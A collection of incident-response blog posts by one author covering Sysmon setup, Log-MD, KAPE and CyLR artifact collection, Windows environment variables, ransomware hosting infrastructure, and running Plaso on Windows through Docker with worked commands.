Why Sysmon? Sysmon provides detailed information about process creations, network connections, and changes to file creation time. This can be incredibly valuable for security monitoring, incident response, and forensic investigations. Some key features include: Process Creation Monitoring:  This is essential for tracking the execution of potentially malicious software. Network Connection Logging:  Captures details about outbound and inbound connections. File Creation Time Changes:  Helps identify when files were created or modified, aiding in malware detection. Installation and Configuration Installing Sysmon is straightforward. You can download Sysmon from Microsoft’s official site , which includes documentation and the executable file. Download Sysmon:  Get the Sysmon executable from the link provided. Prepare Configuration File:  Download a configuration file (e.g., sysmonconfig-export.xml). Install Sysmon:  Execute the following command in the command prompt to install Sysmon with your configuration file sysmon.exe -accepteula -i sysmonconfig-export.xml This command installs the Sysmon driver and service, which will start logging immediately. Viewing Sysmon Logs After installation, Sysmon logs can be found in the Event Viewer under: Event Viewer (Local) → Applications and Services Logs → Microsoft → Windows → Sysmon → Operational This location provides easy access to the detailed logs generated by Sysmon. Recommended Resources To get the most out of Sysmon, leverage these valuable resources: Michael Hagg’s Sysmon Repository:  This GitHub repo contains a wealth of resources and configurations for Sysmon https://github.com/MHaggis/sysmon-dfir Ultimate Windows Event Log Configuration Guide:  Yamato Security’s guide helps enable specific non-default log types useful for ransomware response: https://github.com/Yamato-Security/EnableWindowsLogSettings Awesome Event IDs:  Mathias Stuhlmacher’s curated list of useful event IDs, detailing how to log relevant events: https://github.com/stuhli/awesome-event-ids?tab=readme-ov-file#event-id-databases Important Logs to Collect For comprehensive monitoring and threat detection, ensure you are collecting logs from the following sources: Firewall Logs, VPN Logs, VMware/Citrix Logs, Cloud Logs, Web Logs ,Email Logs ,DNS Logs , Database Logs Conclusion Sysmon helps you monitor, detect, and respond to security threats more effectively. Coupled with the resources and guides mentioned, you can configure Sysmon to meet your specific security needs and improve your overall threat detection and response efforts. Akash Patel

What is Log-MD? Log-MD is a security tool tailored for Windows systems. It audits log settings and advanced audit policy configurations, guiding users to enable and configure these settings for better security and detection . By gathering artifacts from malicious activity, Log-MD speeds up the investigation process, validating the integrity of systems, and facilitating quicker malware analysis. Key Features Audit Checks:  Validates audit settings and ensures they are configured to capture necessary security events. Malicious Discovery:  Collects artifacts related to malware, such as process details, file changes, and registry modifications. Enhanced Logging:  Provides recommendations to improve Windows logging, capturing more detailed and useful data. Compliance Reporting:  Generates audit reports to ensure systems meet compliance standards like WLCS, CIS, USGCB, and AU ACSC. Comparing Log-MD Versions Log-MD comes in three versions: Free, Professional, and Consulting. Here’s a breakdown of their features: Feature Free Professional Consulting Audit Check ✔ ✔ ✔ Bypass Audit Check ✔ ✔ ✔ PowerShell version and audit log checks ✔ ✔ ✔ WLCS & CIS Compliance ✔ ✔ ✔ USGCB & AU ACSC Compliance ✔ ✔ ✔ Create Audit Report ✔ ✔ ✔ Specify Output Directory ✔ ✔ Harvest Windows Log Events ✔ ✔ ✔ Process Tree of Parent-Child Processes ✔ ✔ Custom PowerShell report with configurable settings file to hunt for suspicious PowerShell commands ✔ ✔ Harvest Sysmon Service Events ✔ ✔ Whitelist Processes, Command Line, and IPs ✔ ✔ ✔ Whitelist Files, Paths, & Reg Keys ✔ ✔ ✔ Detailed Log Data Reports 16 30 30 File Hash Baseline ✔ ✔ ✔ File Hash Compare to Baseline ✔ ✔ ✔ Whitelist by File, Location, or Hash ✔ ✔ Master-Digest ✔ ✔ Locked Files Report ✔ ✔ ✔ Locked Files Compare to Baseline ✔ ✔ Registry Baseline ✔ ✔ ✔ Registry Compare to Baseline ✔ ✔ ✔ Evaluate Imported Hives ✔ ✔ ✔ Whitelist Keys & Values ✔ ✔ Large Reg Keys Details ✔ ✔ ✔ Load Hives from other systems ✔ ✔ ✔ Large Reg Key Summary ✔ ✔ WhoIs data for IPs in the IP Connections reports ✔ ✔ Command line WhoIs lookups of IPv4 addresses ✔ ✔ ✔ Harvest SRUM data - Netflow data by Application (Win 8.1 and 10 only) ✔ ✔ List of AutoRuns Report ✔ ✔ ✔ AutoRuns exclude results using Master Digest and Whitelist ✔ ✔ AutoRuns of all WMI namespaces ✔ ✔ ✔ List of Running Processes and Modules Report ✔ ✔ ✔ Running Process and Modules exclude results using Master Digest and Whitelist ✔ ✔ Query only WMI namespaces ✔ ✔ VirusTotal lookups of hashes and/or files from reports ✔ ✔ Automatic VirusTotal lookups when running Autoruns ✔ ✔ Automatic VirusTotal lookups when checking Running Processes and their modules ✔ ✔ 10 VirusTotal reports can be generated from log reports and Sysmon ✔ ✔ For Consultants ✔ Transferrable 90-Day License ✔ Special Artifact Hunting Features ✔ ✔ Sticky Key Exploit Interesting Artifact Report ✔ ✔ null byte in a registry value Interesting Artifact Report ✔ ✔ Unicode character in filename Interesting Artifact Report ✔ ✔ Manual pages 23 70 70 LOG-MD-Pro Slack Channel Community ✔ ✔ Here is an example of the detailed output you can expect from Log-MD: Conclusion Log-MD is an invaluable tool for anyone tasked with Windows system security. Whether you're a small business or a large enterprise, Log-MD offers a cost-effective solution to enhance your malicious discovery and logging capabilities. Akash Patel

In the world of ransomware analysis and incident response, having the right tools at your disposal can make all the difference. Manual Collection Tools Several tools are essential for collecting forensic artifacts, each with unique capabilities that make them indispensable for incident response: Kroll Artifact Parser & Extractor (KAPE) : This tool simplifies the collection of forensic artifacts. It's versatile and can be run locally on machines or deployed across an environment using Group Policy Objects (GPOs) in Active Directory, System Center Configuration Manager (SCCM), or other deployment tools. CyLR : Another powerful tool for live response collection. Like KAPE, CyLR can be deployed via GPOs, SCCM, or other methods, making it an excellent choice for comprehensive artifact collection. Kansa : A PowerShell-driven tool that uses PowerShell Sessions (PSSessions) for remote execution. It relies on PowerShell Remoting (PSRemoting), which might be disabled in many organizations for security reasons. Enabling PSRemoting should be carefully considered, as it can introduce new vulnerabilities. Deploying Collection Tools These tools can be deployed in various ways to ensure they are ready for immediate use when needed: Local Execution : Running the tools directly on the machine where the incident occurred. Remote Deployment : Using GPOs, SCCM, or other deployment tools to push the tools across the network. Mounting Drives : For "dead disk" analysis, where you need to collect artifacts from a drive that is not currently mounted. This can be done by mounting the drive as read-only and running the collection tool. For those who do not have a software deployment tool, PDQ Deploy is a recommended option. Avoiding Memory Stomping It's crucial to have a collection tool or method in place before an incident occurs t o avoid memory stomping , which can overwrite valuable forensic evidence. Pre-installing the tool across devices can help mitigate this risk. Additionally, collecting from shadow copies or using tools like FTK Imager Lite can help bypass issues with locked files. Learning and Resources To deepen your understanding of these tools, here are my blogs: KAPE : https://www.cyberengage.org/post/kape-a-detailed-exploration CyLR : https://www.cyberengage.org/post/ransomware-analysis-a-examiner-s-guide-part1 Kansa : https://www.cyberengage.org/post/power-of-kansa-a-comprehensive-guide-to-incident-response-and-threat-hunting Parsing Collected Artifacts Once artifacts are collected, they need to be parsed. Various tools are available for this purpose, with Eric Zimmerman's suite being a popular choice. However, there are many other tools available, find the best fit for your needs. The Best Commercial Tool: Magnet AXIOM For those seeking an easy-to-use, comprehensive forensics tool for ransomware response, I recommend Magnet's AXIOM. Scaling Artifact Collection: Collecting artifacts from a single host is straightforward, but when you need to analyze data at scale, it becomes crucial to have efficient tools and methodologies. Methodologies for Scalable Artifact Collection 1. Secure FTP (SFTP) Servers: Purpose:  Commonly used to warehouse artifacts collected via deployed tools or scripts. Make sure to enhanced security. Create an account with only write access (no read access) for pushing collections to the server 2. KAPE and CyLR: Both KAPE and CyLR come with built-in SFTP capabilities, making it easy to push collections to a server within your environment. Example Commands: For CyLR: CyLR.exe -u yourUsername -p yourPassword -s 8.8.8.8:22 For Kape: Kape.exe --tsource C: --tdest D:\ --target !SANS_Triage -scs[server] --scp[22/port] --scu [User] --scpw[pwd] --vhdx Leveraging Velociraptor for Advanced Collection Velociraptor Overview: Purpose:  An advanced digital forensic and incident response tool that enhances visibility into endpoints. Capabilities:  Allows remote navigation of file systems, refreshing directories, accessing them live, and performing live parsing on data. Advantages:  Versatile and powerful, offering more than just collection. I haven’t delved into Velociraptor yet, but I plan to learn it in the future. Once I have a good grasp of it, I’ll create a detailed blog post to help you understand and use this tool effectively. Conclusion Being prepared with the right tools and knowledge is essential for effective ransomware analysis and incident response. By leveraging tools like KAPE, CyLR, and Kansa, and deploying them effectively, you can ensure that your response is swift and thorough. For more detailed insights and tool reviews, you can visit the Tool Hub page on my website, where I've created a large number of blogs dedicated to these tools. Akash Patel

Windows environment variables are one such critical component that forensic analysts must be familiar with. These variables function like shortcuts to specific system locations, and they play a pivotal role in both legitimate and malicious activities. What are Environment Variables? Environment variables in Windows are dynamic values that the operating system and applications use to determine various settings and locations on the computer. These variables are often used to point to directories, system paths, and configuration settings. They can be predefined by the operating system or created by users and administrators. Common Windows Environment Variables Here are some commonly used environment variables and their typical paths: %APPDATA% : Points to the current user's Roaming profile directory. Example: C:\Users\noransom\AppData\Roaming This directory is used for storing application data that should roam with the user profile across different machines. %LOCALAPPDATA% : Points to the current user's Local profile directory. Example: C:\Users\noransom\AppData\Local Data in this directory stays local to the machine and does not roam. %TEMP% : Points to the temporary files directory. Example: C:\Users\noransom\AppData\Local\Temp This is where temporary files are stored and is often targeted by malware for temporary storage. %ComSpec% : Points to the command prompt executable . Example: C:\Windows\system32\cmd.exe %ProgramData% : Points to the application data folder that is shared among all users. Example: C:\ProgramData Why Environment Variables Matter in Forensics Environment variables are crucial in forensic investigations for several reasons: Tracing User Activity : By examining the paths pointed to by environment variables, forensic analysts can trace the activities of users on the system. For example, the %APPDATA% directory can contain configuration files and logs of applications that provide insights into user actions. Identifying Malicious Behavior : Attackers often exploit environment variables to obfuscate their activities. They might create custom variables to hide malicious files or chain multiple variables to execute commands without leaving obvious traces. Streamlining Analysis : Knowing how to reference environment variables can streamline the forensic analysis process. Analysts can quickly navigate to relevant directories and files by using these shortcuts. How Attackers Exploit Environment Variables Attackers frequently use environment variables to their advantage in several ways: Persistence Mechanisms : Malware often stores configuration files and executables in directories referenced by environment variables like %APPDATA% or %TEMP%, ensuring they persist across reboots. Command Obfuscation : By creating and chaining environment variables, attackers can obfuscate their commands. For example, an attacker might create a variable %MALWARE% pointing to their payload and then execute it by referencing %MALWARE%. Evasion Techniques : Using environment variables can help malware evade detection by traditional file path-based security mechanisms. Listing Environment Variables To view all environment variables accessible by your current account, you can use the following commands: Command Prompt : set PowerShell : ls env: Practical Example Let's say an attacker has placed a malicious script in the %APPDATA% directory and is using an environment variable to run it. You can quickly check what the %APPDATA% variable points to by running: echo %APPDATA% This command will display the full path, helping you navigate to the directory and investigate further. Conclusion These variables provide valuable insights into user activities and are often manipulated by attackers to obfuscate their actions. By familiarizing yourself with common environment variables and how they are used, you can enhance your ability to detect, analyze, and respond to security incidents effectively. Akash Patel

When it comes to forensic analysis, Windows is an incredibly revealing operating system. It leaves behind numerous traces that can provide critical insights into ransomware incidents. Windows Event Logs (WEL) Windows Event Logs are a treasure trove of information for forensic analysis. They record a wide range of events, from logins and logoffs to application crashes and security incidents. By analyzing these logs, you can reconstruct a timeline of activities and identify potential indicators of compromise. Endpoint Detection & Response (EDR) Many organizations rely heavily on EDR during incident response because of the depth of insights it provides. While EDR is crucial, remember to collect artifacts beyond what EDR offers. File and Folder Access Windows keeps detailed records of file and folder access. Every time a user accesses a file, several forensic artifacts are created, documenting what was accessed, when, and where it was located. These artifacts are invaluable for understanding the scope and impact of an incident. NTFS Metadata Analyzing NTFS metadata, such as $MFT, $UsnJrnl:$J, and $Logfile , can reveal a lot about the activities that occurred within the Windows file system. These metadata files track changes to files and directories , helping you piece together what happened during the ransomware attack. Registry Hives The Windows registry is a central repository for configuration data. Collecting and analyzing registry hive files is essential for identifying persistence techniques. Evidence of Execution Prefetch files, UserAssist entries, ShimCache, and Amcache. These artifacts can show what programs were run, when they were run, and even how often they were executed. Web Browser Databases Web browsers store a wealth of information, including search history, bookmarks, downloads, and more. Analyzing browser databases can provide insights into an attacker’s online activities, such as searching for specific tools or visiting malicious websites. Most common artifact that must be collected and Tool CyLR collect below artifact automatically. Tools: Me personally prefer Kape. But this was another very useful tool or collecting forensic artifacts is CyLR . This tool can be configured to gather a wide range of files and logs from a Windows system. The default collection paths used by CyLR are a good starting point for your analysis. Check it out : https://github.com/orlikoski/CyLR#windows Info About tool: CyLR, short for Cyber Live Response, is an open-source collection tool developed to assist forensic analysts and incident responders. It automates the collection of critical system artifacts, reducing the time. CyLR supports both Windows and Linux environments, making it versatile for various incident response scenarios. How to Use CyLR Using CyLR is straightforward. Here’s a step-by-step guide: Download and Prepare: Download CyLR Extract the tool and copy it to a USB drive/Remotely or a secure location on your forensic workstation. Deploy on Target System: Insert the USB drive into the compromised system. Open a command prompt with administrative privileges. Run CyLR: Navigate to the directory containing CyLR. CyLR.exe -o  (for Windows) ./CyLR -o  (for Linux) CyLR will start collecting artifacts and save them to the specified output directory. Outputs: Kindly Note: Few artifact will be in raw format. For example $MFT, $LogFile. You have to parse them manually or using other tools. Kape will do that for you. Stay prepared, stay vigilant, and let tools be your ally in the fight against ransomware. Akash Patel

Ransomware attacks continue to evolve, and so do the tactics used by ransomware actors. One of the key components in their operations is the infrastructure they use, often hosted on what are known as bulletproof hosting (BPH) sites. In addition to BPH, these actors also utilize virtual private servers (VPSs) and have sophisticated affiliate programs to expand their reach. What is Bulletproof Hosting (BPH)? Bulletproof hosting (BPH) providers offer hosting services without any concern for the type of content being hosted. This makes them ideal for cybercriminals, including ransomware operators, who need to host malicious infrastructure. These providers often operate in countries that have lenient privacy policies and no extradition agreements with countries like the United States. Why BPH?  Unlike regular hosting providers that respond to abuse reports, BPH providers ignore these reports, allowing illegal activities to continue. Finding BPH : These services are often advertised and purchased on darknet forums. https://intel471.com/blog/top-bulletproof-hosting-providers-yalishanda-ccweb-brazzzers-2021 Virtual Private Servers (VPS) In addition to BPH, ransomware actors frequently use virtual private servers (VPS) from companies like DigitalOcean and Vultr. These servers offer more flexibility and anonymity. How it works : Attackers spin up a VPS, use it for a few attacks, and then shut it down to avoid detection. This process is repeated multiple times. Identifying VPS : Sometimes, a whois lookup on an IP address used by attackers can reveal its VPS origin. For instance, Vultr uses Choopa autonomous system numbers (ASNs), which can be identified by the prefix "CHOOPA-ASN." Ransomware Affiliate Programs Ransomware groups have professionalized their operations by creating affiliate programs. These programs are similar to business partnerships where the ransomware developers and affiliates share profits from successful attacks. Evolution : Initially, these programs were informal partnerships. Today, they are structured programs managed by project managers. Rules and Marketing : Ransomware groups often provide specific rules for their affiliates and market their programs to attract skilled partners. Example: Notable Ransomware Affiliate Programs One of the well-known ransomware groups with an affiliate program is the BlackCat/ALPHV group. Their affiliate program is frequently cited as a sophisticated example of how ransomware operations are run like businesses. BlackCat/ALPHV : This group offers a well-structured affiliate program. For more detailed information, you can read Group-IB’s analysis titled “Fat Cats: An analysis of the BlackCat ransomware affiliate program” https://www.group-ib.com/blog/blackcat/ Conclusion By staying informed about these tactics and adopting strong security practices, organizations can better protect themselves against these evolving threats. Akash Patel

In my previous blog, A Deep Dive into Plaso Log2Timeline Forensic Tools, I covered how to use Plaso Log2Timeline on Ubuntu and parse the timeline . However, I understand that Ubuntu might not be feasible for everyone, so in this post, we'll discuss how to run Plaso on Windows. Note that all command parsers will be the same as in the previous blog. Blog Link :- https://www.cyberengage.org/post/a-deep-dive-into-plaso-log2timeline-forensic-tools Getting Started with Docker Desktop To run Plaso/Log2Timeline on Windows, you'll need Docker Desktop. Follow these steps to get started: Download Docker Desktop : Docker Desktop Install Docker : No need to sign in. Just follow the installation prompts and configure it as you would with any other application. Installing Plaso with Docker There are two ways to install Plaso with Docker: Manual Installation : Follow the documentation. https://plaso.readthedocs.io/en/latest/sources/user/Installing-with-docker.html Docker Pull : Simply search for plaso2timeline in Docker and pull the image. Choose the method that suits you best. Testing Your Plaso Docker Image To test your Plaso Docker image, run the following command in PowerShell (ensure Docker is running with administrator privileges): (PowerShell Only) docker run log2timeline/plaso log2timeline.py --version If you get an output, it means Plaso is running successfully. Lets start-------With Main Stuff :) Collecting Artifacts The first step in analysis is to collect artifacts. I recommend using KAPE, which simplifies the process. If possible, collect data in .vhdx format. Mount the Drive : After collecting the artifacts, mount the drive. Analysis Methods Once collection done y ou can Parse/analyze the artifacts in two ways as per me : Parse all artifacts separately using Eric Zimmerman's tools , then collect all outputs into one .plaso file for analysis. This method is time-consuming but effective. Parse most artifacts with Plaso and the $MFT with Eric Zimmerman's MFTECmd tool , then merge them together. Although Plaso can parse the $MFT, I prefer using MFTECmd. Will Proceed with Second Step: 1. Parsing Artifacts with Plaso To parse all artifacts except the $MFT, use the following command in PowerShell: docker run -v E:/C:/data -v D:/Plaso:/output log2timeline/plaso log2timeline.py --parsers '!mft,!usnjrnl,!filestat' --hashers md5 --status_view window --storage_file /output/akash.plaso /data Explanation : -v E:/C:/data: Maps the E:\C directory to /data  in the Docker container. (E: is drive \C folder inside drive) -v D:/Plaso:/output: Maps the D:\Plaso directory to /output in the Docker container. log2timeline/plaso: Specifies the Docker image. log2timeline.py: The command to run inside the container. --parsers '!mft,!usnjrnl,!filestat': Excludes the MFT, USN Journal, and file statistics parsers. --hashers md5: Uses MD5 hashing. --status_view window: Sets the status view to a windowed interface. --storage_file /output/akash.plaso: Specifies the output file path inside the Docker container. /data: The source directory inside the Docker container. This command will run Plaso on the contents of E:\C and save the output to D:\Plaso\akash.plaso. 2. Parsing the $MFT with MFTECmd To parse the $MFT using MFTECmd, run the following command in CMD: MFTECmd.exe --body D:\Plaso --bodyf D:\Plaso\HOSTNAME.mft.bodyfile --bdl C -f "E:\C\$MFT" Explanation : D:\Plaso: Output directory. --bodyf: Specifies the file name in .mft.body. --bdl C: Specifies the drive letter to use with the bodyfile. -f "E:\C\$MFT": Path to the MFT file. 3. Adding MFT Data to the Plaso File Parse the MFT bodyfile and add the data to your Plaso file (in my case akash.plaso) with the following command: (PowerShell) docker run -v D:/Plaso:/output log2timeline/plaso log2timeline.py --parsers 'mactime' --hashers md5 --status_view window --storage_file /output/akash.plaso /output/HOSTNAME.mft.bodyfile Explanation : docker run: Starts a Docker container. -v D:/Plaso:/output: Mounts the D:/Plaso directory to /output inside the container. log2timeline/plaso: Specifies the Docker image. log2timeline.py: Command to run inside the container. --parsers 'mactime': Specifies the parsers to include. --hashers md5: Uses MD5 hashing. --status_view window: Sets the status view type. --storage_file /output/akash.plaso: Specifies the storage file for the timeline. /output/HOSTNAME.mft.bodyfile: Input bodyfile. You now have a final akash.plaso file that includes the MFT data as parsed by MFTECmd and all other artifacts parsed by log2timeline parser. After this you can do with this output, transfer this output into Elasticsearch or Any tool you want or you can parse it into csv format for further analysis using timeline explorer. 4. Importing the Plaso File into Elasticsearch for Timesketch To import the Plaso file into Elasticsearch for use with Timesketch, use the following command: PowerShell docker run -v D:/Plaso:/output log2timeline/plaso psort.py -o elastic --index_name example_host --server 127.0.0.1 --port 9200 /output/akash.plaso Alternatively, you can use the Timesketch importer: timesketch_importer -u [username] -p [password] --host http://127.0.0.1 --index_name HOSTNAME --sketch_name EXAMPLE --timeline_name HOSTNAME /output/akash.plaso 4.1 Exporting to CSV for Timeline Explorer You can also parse the akash.plaso file and create a CSV output for analysis with Timeline Explorer: PowerShell docker run -v D:/Plaso:/output log2timeline/plaso psort.py --output-time-zone utc -o l2tcsv -w /output/timeline.csv /output/akash.plaso Explanation : docker run: Starts a Docker container. -v D:/Plaso:/output: Mounts the D:/Plaso directory to /output inside the container. log2timeline/plaso: Specifies the Docker image. log2timeline.py: Command to run inside the container. --output-time-zone for TimeZone to include. -l2tcsv format for analysis -w /output/timeline.csv: storing the output in writeable format /output/akash.plaso: output which will be converted into csv. Additional Notes For detailed information on commands such as using a time range for analysis, parsers, and filters, refer to my previous blog. You can adjust the commands for running Plaso on Docker as needed. https://www.cyberengage.org/post/a-deep-dive-into-plaso-log2timeline-forensic-tools By following these steps, you can efficiently run Plaso on Windows and perform comprehensive forensic analysis. Happy analyzing! Akash Patel